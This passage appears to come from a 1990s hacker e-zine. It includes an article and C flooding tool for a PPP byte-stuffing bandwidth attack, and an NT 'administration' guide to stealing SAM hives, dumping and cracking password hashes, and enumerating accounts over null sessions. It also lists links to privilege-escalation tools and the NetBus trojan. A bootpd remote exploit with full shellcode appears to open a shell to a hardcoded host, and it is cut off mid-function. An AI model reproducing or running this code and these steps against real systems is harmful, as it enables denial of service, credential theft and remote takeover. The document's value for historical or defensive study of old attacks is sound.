explanation there is a risk that certain illegal values will end up in the information of a PPP frame. To solve this problem byte-stuffing is used. In the case of PPP frames the illegal value is changed to two bytes. One is the value 01111101 (0x7D) the other is the illegal character XOR'd with 0x20. In the case of 0x7E it will become 0x7D, 0x5E. This also makes any 0x7D which was not added by the PPP daemon to be encoded in the same manner to avoid corrupting valid data. What this means is that a single byte (for example 0x7E) will be converted into a pair of bytes (0x7D, 0x5E) but only when encapsulated in PPP frames. If 4-bytes in the datagram are 0x7E then each of those 4-bytes will be converted into the 0x7D, 0x5E pair. This results in the 4-bytes being turned into 8-bytes when encapsulated in a PPP frame. This added data is known as "overhead". The implications of this is that maliciously engineered packets could be made to exploit the byte-stuffing method and can cause a worst case overhead of 100%. This means that a packet could literally double in size when encapsulated in a PPP frame. A 1024-byte ECHO_REQUEST could seem like 2048-bytes. This means that an attacker requires half the bandwidth to cause the same amount of disruption. This also means that if an attacker is on a PPP connection and is attempting this attack he will also find that he requires as much bandwidth to transmit the packets as the victim requires to recieve them. To test this idea all you need to do is send two packets, one containing random data. The second containing only 0x7E. or any of the following 0x7D, 0xFF all considered illegal values in datagrams in a PPP frame. Watch your ppp interface (for linux pppstats -w 1 is good) and look at the number of bytes. Below is the actual output of pppstats on my ppp interface while I'm using linux's ping to send the two packets: Regular packet using ping's random padding method: created with: ping -c 1 -s 500 xxx.xxx.xxx.xxx in pack comp uncomp err | out pack comp uncomp ip 0 1 0 0 0 | 537 1 0 0 1 Malicous packet padded with 0x7E created with: ping -p 7e -c 1 -s 500 xxx.xxx.xxx.xxx in pack comp uncomp err | out pack comp uncomp ip 0 1 0 0 0 | 1025 1 0 0 1 -------- Conclusion Using this method attackers can lower the actual number of bytes traveling from point A to point B but not actually lose its effectiveness. Any device connecting with PPP is possibly vulnerable to this specialized attack. But this goes beyond simply PPP, any data-layer protocol which uses byte-stuffing for illegal values would be vulnerable to similar exploitation. A paper I discovered while researching this attack describes a way to prevent byte-stuffing attacks from being as effective. "Consistent Overhead Byte Stuffing" by Stuart Cheshire and Mary Baker. In it they present several ways to use more efficient byte stuffing. You can download a copy at: http://deathstar.stanford.edu/~cheshire/papers/COBS/ Noc-Wage -*- wage@idirect.ca 12/10/98 -------- Modified pingflood.c pingflood.c was a program which showed a flaw in linux's ping which allowed regular users to trick ping into flooding using alert signals. I've modified it so that you can set the illegal character it uses as well as the size of the packets /* Stuffit.c Noc-Wage -*- wage@idirect.ca 12/12/98 This is just a modified version of: pingflood.c by (AntireZ) Salvatore Sanfilippo enhanced by David Welton I simply made it so that it will generate the ping packets so that they contain 0x7e which is an illegal character in PPP frames. I also made it so you could set the size of the packet hopefully this came with my keen veracity article but incase it didn't here is part of it so you understand why this even exsists: Explanation of Byte Stuffing As explained in the PPP frame explanation there is a risk that certain illegal values will end up in the information of a PPP frame. To solve this problem byte-stuffing is used. In the case of PPP frames the illegal value is changed to two bytes. One is the value 01111101 (0x7D) the other is the illegal character XOR'd with 0x20. In the case of 0x7E it will become 0x7D, 0x5E. This also makes any 0x7D which was not added by the PPP daemon to be encoded in the same manner to avoid corrupting valid data. What this means is that a single byte (for example 0x7E) will be converted into a pair of bytes (0x7D, 0x5E) but only when encapsulated in PPP frames. If 4-bytes in the datagram are 0x7E then each of those 4-bytes will be converted into the 0x7D, 0x5E pair. This results in the 4-bytes being turned into 8-bytes when encapsulated in a PPP frame. This added data is known as "overhead". The implications of this is that maliciously engineered packets could be made to exploit the byte-stuffing method and can cause a worst case overhead of 100%. This means that a packet could literally double in size when encapsulated in a PPP frame. A 1024-byte ECHO_REQUEST could seem like 2048-bytes. This means that an attacker requires half the bandwidth to cause the same amount of disruption. This also means that if an attacker is on a PPP connection and is attempting this attack he will also find that he requires as much bandwidth to transmit the packets as the victim requires to recieve them. If you don't understand why this is a bad thing then don't bother using this program because you'll most likely use it ineffectively. */ #include #define PING "/bin/ping" main( int argc, char *argv[] ) { int pid_ping; if (argc < 3) { printf("use: %s (I'd suggest 7e or 7d)\n", argv[0]); exit(0); } if(!(pid_ping = fork())) execl(PING, "ping", argv[1], "-s", argv[2], "-p", argv[3]); if ( pid_ping <=0 ) { printf("pid <= 0\n"); exit(1); } sleep (1); /* give it a second to start going */ while (1) if ( kill(pid_ping, SIGALRM) ) exit(1); } =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= NT Security - Tips & Techniques Neathack =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= GREETS TO YOU ALL MY BROTHERS/SISTERS FROM "NeaTHack or NtWaK0" To me a hacker isn't just someone doing "illegal" things like cracking other peoples passwords or breaking into some computer to steal information. I think a hacker is everybody interested in experimenting with computers or the telephone network. Quote: "Any Grandma can call herself a hacker when she's able to program her VCR" I am glad to share with you some NT nice Administration Tips and technique. Before getting into the heart I would like to introduce NT model and what is NT DOMAIN about. That will allow you to get a least some idea what I am going to talk about laterz. The following M1cro$oft products can share their resources in workgroups: · W1nd0wz for Workgroups · W1nd0wz 95 · W1nd0wz NT Workstation · W1nd0wz NT Server Organizations that are large or that want more control over their networks need something more than workgroups. Therefore, M1cro$oft has incorporated the domain concept into W1nd0wz NT Server. --Domains-- Domains borrow concepts from workgroups and from directory services. Like workgroups, domains can be fairly informal and can be administered using a mix of central and local controls. Domains can evolve fairly easily and can be set up with less planning than typically is required for a directory. Like a directory, a domain organizes the resources of several servers into one administrative structure. Users are given logon privileges to a domain rather than to each individual server. Because a domain controls the resources of several servers, it is easier to administer than a network with many stand-alone servers. Servers within the domain advertise their services to users. Users who log on to a domain gain access to all resources in the domain for which they have been granted access. They can browse the resources in a domain much as they would browse the resources in a workgroup; however, domains are hosted by W1nd0wz NT Servers and can be made more secure than workgroups. When networks become large enough to require several domains, administrators can establish trust relationships among domains. Trust relationships simplify administration because a user is required to have an account in only one domain. Other domains that trust the user's logon domain can rely on the logon domain to authenticate the user's logon. W1nd0wz NT Server domains are not the same as domains found on TCP/IP networks. TCP/IP domains are discussed in Chapter 16, "Using TCP/IP." --Domains and Trust Relationships-- Domains are essentially improved workgroups. Access to domain resources is controlled by a domain controller. The user is assigned a single domain account and a password that is used to control access to all domain resources. W1nd0wz NT Server domains also support the use of groups that enable administrators to assign and change permissions for large numbers of users more efficiently. You will learn about managing users and groups in Chapter 11, "Managing Users and Groups." --Domains and Domain Servers-- A server in a domain has one of three roles: · One W1nd0wz NT Server stores the master copy of the domain's user and group database. The PDC is responsible for synchronizing the account database with all BDCs. · Other W1nd0wz NT Servers can store backup copies of the domain's user and group database. · Servers can participate in a domain without being designated as primary or backup domain controllers. Each of these roles is described more fully in the following sections. --The Primary Domain Controller-- The first W1nd0wz NT Server in the domain is configured as a primary domain controller (PDC). The User Manager for Domains utility is used to maintain user and group information for the domain. This information is stored in a domain security database on the primary domain controller. --Backup Domain Controllers-- Other W1nd0wz NT Servers in the domain can serve as backup domain controllers (BDC). Each backup domain controller stores a replica of the database on the primary domain controller, which is replicated periodically to distribute changes made to the main database on the PDC. Replication of the database has several advantages. If the primary domain controller experiences a hardware failure, one of the backup domain controllers can be promoted to the primary role. Having one or more backup domain controllers builds a degree of fault tolerance into your network. Each domain should have at least one BDC. Backup domain controllers also can participate in the logon process. When a user logs on to a domain, the logon request can be handled by any primary or backup domain controller. This spreads the logon processing load across the available servers and improves logon performance. This can be an important benefit in domains with large numbers of users. Changes cannot be made to the domain database unless the PDC is functioning. If the PDC fails or is shut down for maintenance, you can promote a BDC to function as the PDC. Although the PDC is required to make changes to the domain database, other domain operations are not dependent on the PDC. Users can log on to the domain using a BDC if the PDC is unavailable. --Servers-- Computers running W1nd0wz NT Server can also function as independent or stand-alone servers, which may or may not participate in domains. The term servers represents member server or stand-alone server. These servers do not function as primary or backup domain controllers. They can take advantage of the user and group databases, however, that are maintained for a domain, and you can assign user and group permissions for the server using the User Manager for Domains. The server also can maintain its own database of users, and users can log on to the server independently of the domain. When this is done, the server cannot utilize the user and group database of a domain, and the server handles accounts much like computers running W1nd0wz NT Workstation. You might choose to configure a stand-alone W1nd0wz NT Member Server for several reasons: · The server can be administered by different staff members. Many W1nd0wz NT Servers are used for application servers, such as SQL databases. If you configure a database server as an independent server, you can assign a member of your database staff as the server administrator. · Attending to logon requests can use a significant part of a server's processing capability. If you configure the server as an independent server, it can concentrate on servicing a single function, such as providing application services. · When a server is functioning as a primary or backup domain controller, it is difficult to move the server to a new domain. If there is a chance the server will move to a different domain, configure it as an independent server. --Domain Models-- Proper use of trust relationships enables organizations to build enterprise networks that still require only a single logon procedure for resource access. M1cro$oft has defined four models for domain trust relationships. If you are configuring a multi-domain network, you will want to consider the merits and disadvantages of each model. There are two reasons for adding domains: · For organizational reasons · To improve network performance Regarding network performance, you will find that M1cro$oft's descriptions are a bit vague. You can use a single domain model, for example, "if your network doesn't have too many users..." That doesn't give you much help during the planning stages. Unfortunately, there are many variables, and it is difficult to come up with a simple prescription for adding domains. W1nd0wz NT Server can, after all, run on everything from an Intel 80486 PC to a multiprocessor RISC system. Such a broad range of hardware makes performance generalizations difficult. Fortunately, W1nd0wz NT Server domains make it easy to reorganize the LAN as it grows. The four domain models defined by M1cro$oft follow: · Single domain · Master domain · Multiple-master domains · Complete trust A single domain network has several advantages: · It is easier to manage because resources are centralized. · No trust relationships are required. · Group definitions are simpler. You need to consider a multi-domain model in the following situations: · If browsing is slow · If too many users are degrading performance · If your organization wants to assign domains to departments · If you want to have some resources in their own domains --The Master Domain Model-- The master domain model designates one domain to manage all user accounts. The master domain also supports global groups. Global groups can export group information to other domains. By defining global groups in the master domain, other domains can import the group information easily The master domain is named Keystone, and is managed centrally by the MIS staff. All users are defined in Keystone, as well as some groups that will make administration easier. Only the primary and backup domain controllers in the Keystone domain are used to store user and group account information. Because users cannot log on to the network without a working domain account database, a master domain always should include at least one backup domain controller in addition to the primary domain controller When users log on to the network, they always log on to the Keystone master domain. After they have logged on, they can access resources in other domains that trust Keystone --The Multiple Master Domain Model-- Each master domain supports about half the user accounts. This spreads the processing of logons over several domains. Each domain supports some of the groups that are accessed by the department domains. Under this model, each master domain trusts every other master domain. This is a convenience for administrators, but is necessary for users only if they actually will be using resources on one of the master domains, which is not ordinarily the case. To reduce the likelihood of security holes, only administrators should be given permissions to access resources in the master domains. Users should be given permissions only in the department domains. Each department domain trusts each master domain. It is not necessary for department domains to trust each other Because users are granted most privileges based on their memberships in master domain groups, it is a good idea to group related users into the same master domains. All your users in Accounting should log on to the same master domain, for example. Otherwise, you are forced to establish similar groups in each master domain. With more groups, it becomes far more difficult to establish privileges in the department domains The multiple master domain model has many desirable features: · It is scalable to any organizational size. · Security is managed centrally. · Departments can manage their local domains, if desired. · Related users, groups, and resources can be grouped logically into domains. Disadvantages of the multiple master domain model include the following characteristics: · The number of groups and trust relationships multiply rapidly as the number of domains increases. · User accounts and groups are not located in a single location, complicating network documentation. --The Complete Trust Model-- The master domain models assume that a central department exists that can take responsibility for managing user and group security for the complete organization In the complete trust model, every domain is configured to trust every other domain. Users log in to their department domains and then access resources in other departments by means of trust relationships. As with the multiple master domain model, the number of trust relationships required increases rapidly as domains increase. Three domains require six trust relationships (two between each pair of domains), whereas five domains require 20 trust relationships. If n is the number of domains, then the network requires n ¥(n-1) trust relationships If your organization does not have a central MIS department, networking is a great reason for establishing one. Besides the need to maintain tight security, several other functions are best when centralized. Here are some examples: · File backup · Communications services · E-mail maintenance · Management of the network infrastructure (media, hubs, and so on) Few departments have personnel who possess the expertise to do these jobs well. Also, network management in a large organization calls for personnel who are devoted completely to the task. Therefore, I don't put much credibility into the advantages that M1cro$oft attributes to the complete trust model, but here they are nevertheless: · No central MIS department is required. · The model scales to any organizational size. · Departments retain control of their users and resources. (But, it can be argued, they surrender that control by trusting everybody.) · Users and resources are grouped logically by departments --Estimating Domain Capacity-- All the issues come down to the size of the file that is used to store the Security Accounts Manager (SAM) domain database. The size of the SAM database file matters because the entire database is made resident in a domain controller's RAM. Large SAM databases have two effects: they hog a lot of the domain controller's RAM, and they take a long time to load, prolonging the process of booting the computer. Three types of objects are stored in the SAM domain database: · User accounts use 1,024 bytes (1 KB) each. · Computer accounts use 512 bytes (0.5 KB) each (only W1nd0wz NT computers require computer accounts). · Global group accounts use 512 bytes plus 12 bytes per users. · Local group accounts use 512 bytes plus 36 bytes per user. Assume that you have 1,000 users and 500 NT computers that require accounts. To organize the domain, you require 10 global groups with an average membership of 200 users. You also require 10 local groups with an average membership of 20. How large a SAM database would that generate? 1,000 users ¥ 1,024 bytes=1,024,000 bytes 512 computer accounts ¥ 512 bytes=262,144 bytes 10 global groups ¥ 512 bytes=5,120 bytes 2,000 global group members ¥ 12 bytes=24,000 bytes 10 local groups ¥ 512 bytes=5,120 bytes 200 local group members ¥ 36 bytes=7,200 bytes Total SAM database size=1,324,589 bytes The total size of the SAM database would be approximately 1.5 MB. That's not particularly large as SAM databases go, and you can easily support this network in a single domain. Depending on its processing power and on the services it provides, a domain controller can support between 2,000 and 5,000 users. A domain with 26,000 users, therefore, might require from 6 to 13 domain controllers to ensure adequate performance Now Let US do some NT Administration GOAL ONE: Gain Access to the SAM Users can gain access to the SAM and Security hives in several ways. M1cro$oft says the best way to protect your NT systems is to protect the administrator accounts, but administrators are not the only users who can access the SAM and Security hives. Server operators, backup operators, and even ordinary domain users can view and dump hash codes from the Registry. Protecting administrator accounts is not enough. By default, no user has the proper permissions to access or even view the NT SAM. However, the SAM and Security hives are like other files. Users who have permission to copy the Registry files--such as users who might have to back up the Registry--can copy and manipulate these files on a whim. If you log on as a backup operator, however, you can't just copy the SAM and Security hives. The Registry is open while NT is running, and a sharing violation occurs when you attempt to copy the files. However, the Regback utility on the W1nd0wz NT resource kit CD-ROMs lets anyone in the administrator, server operator, or backup operator local groups copy the open Registry. The list of potentially dangerous users, however, includes more than these three groups. Regular domain users can invade NT security if NT is on a FAT volume and they have permission to restart the machine. All they have to do is boot to DOS, copy the SAM and Security hives from the %SystemRoot%\System32\ config directory, and they're in business. In general, if NT is on an NTFS volume, domain users can't boot DOS and copy the hives. But NTFSDOS, a utility written by Mark Russinovich and Bryce Cogswell, lets users mount the NTFS volumes in DOS. (Mark Russinovich and Bryce Cogswell present one view of NTFSDOS and Joel Sloss another view in point and counterpoint articles in the September 1996 issue.) Run NTFSDOS, go to the %SystemRoot%\System32\config directory, and copy the hives. M1cro$oft says that true security is physical security. Following M1cro$oft's advice, lock the machines away, and remove ordinary users' permissions to restart the computers. If users can't restart the machines, the possibility of rebooting to DOS on a FAT volume or using NTFSDOS is no longer a threat. Is NT secure now? Ordinary domain users can't copy the open Registry because the action will cause a sharing violation. Nor can users back up the system because they don't have permissions associated with administrator, server operator, or backup operator accounts. But a fundamental feature of NT's built-in availability is the Repair directory. After a successful installation and each time you run the Rdisk utility, NT stores a backup of the Registry in %SystemRoot%\Repair. The backup files aren't open, and users can easily copy them if they can log on locally or if the directory is shared. By default, the NTFS permissions don't protect the Repair directory. All users have read control, and read control offers enough permission to copy files. For ordinary users to obtain the SAM hive that contains passwords, they must access the current version of the Registry. The Registry is vulnerable in at least two ways. First, even though NT doesn't back up the Security and SAM hives by default when you run Rdisk, a copy of the SAM from the original NT installation remains in the Repair directory. If the administrator has not changed the administrative password since the original installation, the password is at risk. Second, many administrators use the rdisk /s command, which includes the Security and SAM hives in a backup to an unprotected Repair directory (for more information about the Rdisk utility, see Michael D. Reilly, "The Emergency Repair Disk," January 1997). In summary, here's how you can prevent an ordinary domain user from gaining access to the SAM and Security hives on your servers: * Don't permit local logon to servers. * Use NTFS volumes instead of FAT volumes. * Physically secure the servers. * Change the default permissions of the Repair directory. * Secure your Emergency Repair Disks and tape backups. Remember, users can still access their local machine's Registry through the Repair directory or an Emergency Repair Disk and attempt to crack the local machine's administrator password. One way to prevent this attack is to convert to NTFS and set more restrictive permissions on each workstation's Repair folder. GOAL TWO: Dump the Hash Codes Even after users have copies of the SAM and Security hives, they can't easily view hash codes. They have to log on to an NT machine as Administrator and dump the hash codes with PWDUMP. If they manually copy both Registry files into their own Registry, NT will use the hijacked SAM. Although users don't have administrative privileges at work, they are administrators on their home PC. From their home PC, they can dump the hash codes and, at their leisure, perform as many dictionary attacks as they need to find the passwords. To copy the hijacked SAM to a local Registry when NT is on a FAT volume, users just boot to DOS and copy the file. If NT is on an NTFS volume, users can use Regrest, another utility on the resource kit CD-ROMs. However, the hives in the Repair directory or from an Emergency Repair Disk are compressed, and a compressed Registry doesn't work in NT. But the compression algorithm isn't difficult; you can easily uncompress those files with the Expand command in %SystemRoot%\System32. If users replace the SAM and attempt to log on as the hijacked Administrator, they overwrite their personal administrative password and don't know the new stolen password. However, the utility NT Locksmith, available at http://www.winternals.com, lets you change the local administrator password. Running this utility requires physical access to the NT machine. Most people do not have physical access to servers at work, but they have access to their home PC. After users change the password, they can log on locally and dump the hash codes from the hijacked SAM. GOAL THREE: Crack NT's Passwords Once users have the hash codes, they can use NT Crack, L0phtCrack, or a similar utility to perform a dictionary attack against NT.The outcome of the password crack depends on the quality of the wordlist, or dictionary, hackers use to perform the crack. The more words, dates, numbers, and wordplays that are in the list--and the more complex they are--the better the chance for a successful crack. Therefore, a good password security policy greatly reduces the likelihood of a successful crack. For good password security, you can prohibit blank passwords and require a certain password length, for example a six-character minimum. Require complex passwords, usually a random selection of letters and numbers. NT's User Manager won't let you force complex passwords. However, you can set all your users' passwords manually and not let users change them. Now Let US have Fon with da SID. Originally this was found by David LeBlanc and Dominique Brezinski. Evgenii Borisovich Rudnyi pointed this out again.He wrote two utilities, user2sid and sid2user, which are actually command line interfaces to WIN32 functions, LookupAccountName and LookupAccountSid. So, no hacking, just what is permitted by MS. Now, it happens that to use these function a user have just to be EVERYONE. It means that an ordinary user can find without a problem a built-in domain administrator name, which MS recommends us to rename from administrator to something else (see for example, course 803, Administrating W1nd0wz NT 4.0). Assuming that user's computer is in the domain, the task is solved by two steps. 1) Looking up a SID of any domain account, for example Domain Users user2sid "domain users" S-1-5-21-201642981-56263093-24269216-513 Now we know all the subauthorities for the current domain. All the domain account SIDs are different by the last number only (so called RID). 2) Looking up an built-in administrator name (RID is always 500) sid2user 5 21 201642981 56263093 24269216 500 Name is SmallUser Domain is DomainName Type of SID is SidTypeUser Now it is possible to look up all the domain accounts from the very first one (RID = 1000 for the first account, 1001 for the second and so on, RIDs are never used again for the current installation). sid2user 5 21 201642981 56263093 24269216 1000 sid2user 5 21 201642981 56263093 24269216 1001 ... It should be interesting for everyone to know the history of developing the domain account database. Well, this is not the end of the story. The anonymous logon is also in the EVERYONE group. This means that actually it is possible to find out who is a built-in administrator and to see the history of the SAM at any domain into which you can run the anonymous session. Note that anonymous sessions are not audited by logon/logoff category. Below is an example of what you can learn provided the netbios ports are open (the listing is fictional). nslookup www.xyz.com Non-authoritative answer: Name: www.xyz.com Address: 131.107.2.200 net use \\131.107.2.200\ipc$ "" /user:"" The command completed successfully. user2sid \\131.107.2.200 "domain users" S-1-5-21-201642981-56263093-24269216-513 Number of subauthorities is 5 Domain is XYZ_domain Length of SID in memory is 28 bytes Type of SID is SidTypeGroup sid2user \\131.107.2.200 5 21 201642981 56263093 24269216 500 Name is XYZAdmin Domain is XYZ_domain Type of SID is SidTypeUser sid2user \\131.107.2.200 5 21 201642981 56263093 24269216 1000 Name is Domain is XYZ_domain Type of SID is SidTypeDeletedAccount sid2user \\131.107.2.200 5 21 201642981 56263093 24269216 1001 Name is Simpson Domain is XYZ_domain Type of SID is SidTypeUser sid2user \\131.107.2.200 5 21 201642981 56263093 24269216 1112 LookupSidName failed - no such account For those who would like to try it, the utilities can be found at: http://www.ntbugtraq.com and follow the links to the new downloads page where you'll find his usage page with a link to the zip. SOLUTION SP3 does not prevent this to happen. At this time, there is no fix for this, except to filter connections to port 139. So, at the moment, if you can get a null session, you can dump all the users, groups, and machine accounts. Linkz and Ulilities Needed? I will include the utilities needed to administer --:) NT PWDUMP > http://www.geocities.com/CapitolHill/7237/pwdump.zip NTFSDOS > http://www.geocities.com/CapitolHill/7237/ntfs130.zip LOPHTCRACKER > http://www.geocities.com/CapitolHill/7237/lc15-li.zip ftp://ftp.technotronic.com/M1cro$oft/lc201exe.zip NT Security/Unsecurity > http://www.ntsecurity.net/ BUGTRAG Archive > http://www.geek-girl.com/bugtraq/search.html C2MYAZZ SMB Downgrade When a M1cro$oft networking client creates a new connection to an NT Server, it is possible for another computer on the same physical network to `spoof' the M1cro$oft client into sending a clear-text password to the NT Server, bypassing all password encryption and allowing the client's clear-text password to be discovered by any other device on the same physical network. his program actually runs on a W1nd0wz based system loaded with Novell ODI style drivers running in promiscuous mode. Once active, the software listens for SMB negotiations, and upon detecting one, the software sends a single packet to the client instructing it to downgrade its connection attempt to a clear text level - at which point the client silently obeys by sending its password in clear readable text. Once this happens this little piece of software actually grabs the password as it travels over the wire and displays it on the screen. The client is successfully connected to the NT Server, and the user remains none-the-wiser that its password has just been grabbed ftp://ftp.technotronic.com/M1cro$oft/c2myazz.zip l0pthcrack 2.01 Challenge / Response Exploit PPTP sniffer for Solaris PPTP sniffer works with any unix that has libpcap. This program also contains an active attack which exploits a MS-CHAP problem to retrieve the LANMAN and NT password hashes without the extra layer of encryption of the challenge/response. This makes password cracking much quicker. W1nd0wz NT supports the following two types of challenge/response authentication: - LanManager (LM) challenge/response - W1nd0wz NT challenge/response To allow access to servers that only support LM authentication, W1nd0wz NT clients currently send both authentication types. Here is a description of the challenge that takes place over the network when a client, such as a W1nd0wz 95 machine, connects to an NT Server ftp://ftp.technotronic.com/M1cro$oft/lc201exe.zip GETADMIN Getadmin.exe works because of a problem in a low-level kernel routine that causes a global flag to be set which allows calls to NtOpenProcessToken to succeed regardless of the current users permissions. This in turn allows a user to attach to any process running on the system, including a process running in the system's security context, such as WinLogon. Once attached to such a process, a thread can be started in the security context of the process. In the specific case of GetAdmin, it attaches to the WinLogon process, which is running in the system's security context, and makes standard API calls that add the specified user to the administrators group. It is important to note that any account which has been granted the rights to "Debug Programs" will always be able to run Getadmin.exe successfully, even after the application of the hotfix. This is because the "Debug Programs" right allows a user to attach to any process. The "Debug Programs" right is initially granted to Administrators and should be only granted to fully trusted users. Also, if Getadmin.exe is run with an account that is already a member of the administrators local group, it will still work (even after applying the hotfix). This is by design. Members of the administrators group always have the rights to make the calls GetAdmin needs in order to succeed ftp://ftp.technotronic.com/M1cro$oft/getadmin.zip SECHOLE Sechole.exe allows a non-administrative user to gain debug-level access on a system process. Using this utility, the non-administrative user is able to run some code in the system security context and thereby grant himself for herself local administrative privileges on the system. Sechole.exe locates the memory address of a particular API function (OpenProcess) and modifies the instructions at that address in a running image of the exploit program on the local system. Sechole.exe requests debug rights that gives it elevated privileges. The request is successful because the access check for this right is expected to be done in the API that was successfully modified by the exploit program. Sechole.exe can now add the user who invoked Sechole.exe to the local Administrators group ftp://ftp.technotronic.com/M1cro$oft/sechole2.zip NetBus 1.60 Similar in functionality to Back Orifice. Works under NT too. Cleaner 1.9c This program will clean up several trojans and has the potential to clean up after any trojan attack ftp://ftp.technotronic.com/M1cro$oft/netbus.zip ftp://ftp.technotronic.com/M1cro$oft/cleaner19c.zip NTFSDOS v2.0 Allows you to boot a DOS diskette and READ an NTFS Partition ftp://ftp.technotronic.com/M1cro$oft/ntfs20r.zip Linux NTFS Driver NT secured filesystem (NTFS) can be read from Linux, bypassing filesystem security ftp://ftp.technotronic.com/M1cro$oft/ntfs-970312_tar.gz My Personal Feelings I feel as though we should learn to coexist and compromise with hackers. As long as there are computers, there will be hackers. NeatHack.... e\\\_a_///t \\ - - //H N( @ @ )acK +---------------oOOo-(_)-oOOo--------------------------------------+ |"Kn0w13dg3 i5 0n1y p0w3r if U hav3 th3 wi5d0m t0 us3 i7 c0rr3c71y"| |"I7'5 nic3 70 b3 imp0r7an7. Bu7 i7'5 m0r3 imp0r7an7 70 b3 nic3" | +------------------------Oooo--------------------------------------+ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Rootfest 99 Defiant/Lothos =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Rootfest 99 Details Rootfest is a computer security convention and conference being held in Minneapolis, MN. May 21-23 1999 As far as I know, it's the first of it's kind in the whole Midwest. It will be composed of many speakers, vendors, contests, events and door prizes. We welcome all computer security professionals, the computer underground, IT professionals, government agents, feds, and anyone who would like to come and learn about computer security. We've got a while variety of speakers lined up already and we are still in the process of adding more. Speakers We currently have numerous speakers lined up for rootfest and we would like to be able to add to the list. If you would like to speak please contact lothos via e-mail, lothos@trifid.net. Bruce Schiener Topic: Topic to be announced. Credentials: He is a published author of Applied Cryptography and also the president of Counterplane Systems. Steve Stakton aka Optiklenz Topic: Cisco PIX Firewall Security Analysis Credentials: Founder of Legions Interactive and LoU. He has accomplished much in his time as an Underground Researcher. Adam L. Beberg Topic: V3 Security(Tenative) Credentials: Distributed.net founder, The worlds largest computer. Konceptor Topic: Monitoring IRC, evading capture, Naval Surface Warfare Center. Credentials: US Hacker. Mike Roadancer Topic: "Hacker - It's not a dirty word" Hackers in the workplace, Credentials: Founder, Hackers Defence Foundation. Brain Ristuccia Topic: Ideas on Internet censorship Credentials: Bay Networks contractor Paul McNabb Topic: Trusted Operating Systems Technology in Web-based computing Credentials: CTO of Argus Systems Group, Inc. Brenno J.S.A.A.F de Winter Topic: Internet Security in Europe - State of Affairs. Credentials: Netherlands Hacker. DataShark Topic: Tempest Monitoring and Protection Credentials: Systems Administration and Hacker. Richard Thieme Topic: Actionable Intelligence: Beyond Trophy-Hacking to Playing for Big Stakes. Credentials: Black Hat keynote speaker, Defcon 4,5,6 speaker. To close I would like to thanks everyone that is supporting me and the rest of the rootfest team. We are still in the process of finalising more details such as events like hack the flag and also adding more speakers to our already impressive list. If you would like to contact me further regarding rootfest please check out http://www.rootfest.org or feel free to e-mail me lothos@trifid.net. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Bootpd Exploit Broken ass code Revamped by Bronc =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= /* * Bootpd Exploit against debian linux 1.3 and 2.0 and possibly other * * (C) 1998 Willem Pinckaers W.H.J.Pinckaers@cpedu.rug.nl * * * Broken ass code fixed by Bronc Buster - Dec 1998 * * If you get this and it's missing the two .h files * just forget it (unless you are lucky and have them already) * Anyone with half a brain could of fixed this to work, so if * you are using this now, either I gave it to you, or you are * a k0d3 kIdDi3 ;) * * to complie: gcc bootpd.c -o bootp * */ #include #include #include #include #include #include #include "bootp.h" #define MAX_MSG_SIZE 500 char shellcode[] = "\x31" "\xc9" "\x89" "\xc8" "\x04" "\x66" "\x41" "\x89" "\xca" "\x89" "\xcb" "\xeb" "\x7f" "\x5f" "\x89" "\x4f" "\x08" "\x41" "\x89" "\x4f" "\x04" "\x80" "\xc1" "\x04" "\x89" "\x4f" "\x0c" "\x8d" "\x4f" "\x04" "\xcd" "\x80" "\x89" "\x07" "\x31" "\xc9" "\x80" "\xc1" "\x02" "\x66" "\x89" "\x4f" "\x0c" "\x66" "\x89" "\x4f" "\x0e" "\x80" "\xc1" "\x0e" "\x66" "\x89" "\x4f" "\x08" "\x66" "\xb9" "\x30" "\x39" "\x66" "\x89" "\x4f" "\x0e" "\x8d" "\x47" "\x0c" "\x89" "\x47" "\x04" "\x31" "\xc9" "\xb1" "\x03" "\x89" "\xca" "\x89" "\xcb" "\x89" "\xf9" "\x31" "\xc0" "\x04" "\x66" "\xcd" "\x80" "\x31" "\xc0" "\x89" "\xc1" "\x04" "\x3f" "\x89" "\xc2" "\x8b" "\x1f" "\xcd" "\x80" "\x89" "\xd0" "\x41" "\xcd" "\x80" "\x89" "\xd0" "\x41" "\xcd" "\x80" "\x31" "\xc0" "\x89" "\x47" "\x10" "\x88" "\x47" "\x1b" "\x8d" "\x47" "\x14" "\x89" "\x47" "\x0c" "\x31" "\xc0" "\x04" "\x0b" "\x8d" "\x5f" "\x14" "\x8d" "\x4f" "\x0c" "\x8d" "\x57" "\x10" "\xcd" "\x80" "\x31" "\xc0" "\x40" "\xcd" "\x80" "\xe8" "\x7c" "\xff" "\xff" "\xff" "\x2e" "\x41" "\x41" "\x41" "\x41" "\x41" "\x41" "\x41" "\x41" "\x41" "\x41" "\x41" "\x41" "\x41" "\x39" "\x30" "\xc0" "\xa8" "\x01" "\x01" "\x2f" "\x62" "\x69" "\x6e" "\x2f" "\x73" "\x68" "\x00"; #define SERVER_PORT 67 char client_addr[16] = "127.000.000.001"; char host_addr[16] = "207.053.133.005"; int realpath_adjust = 0; int exploit_length = 1200; struct sockaddr_in server_addr; void sendpacket(int, struct bootp *); void build_packet(struct bootp *, int, char**); void get_args(int, char**); void usage(void); int main(int argc, char *argv[]) { struct bootp* bp; int s; get_args(argc, argv); server_addr.sin_family = AF_INET; server_addr.sin_port = htons(SERVER_PORT); server_addr.sin_addr.s_addr = inet_addr(host_addr); if ((s = socket(AF_INET, SOCK_DGRAM, 0)) < 0) { fprintf(stderr, "cannot create socket\n"); exit(1); } if ((bp = (struct bootp*) malloc(MAX_MSG_SIZE + 1000)) == NULL) { (void) fprintf(stderr, "Cannot malloc.\n"); exit(1); }; (void) memset(bp, 0, MAX_MSG_SIZE + 1000); /* ai exploit isn't secure */ build_packet(bp, argc, argv); sendpacket(s, bp); } void sendpacket(int s, struct bootp *bp) { if 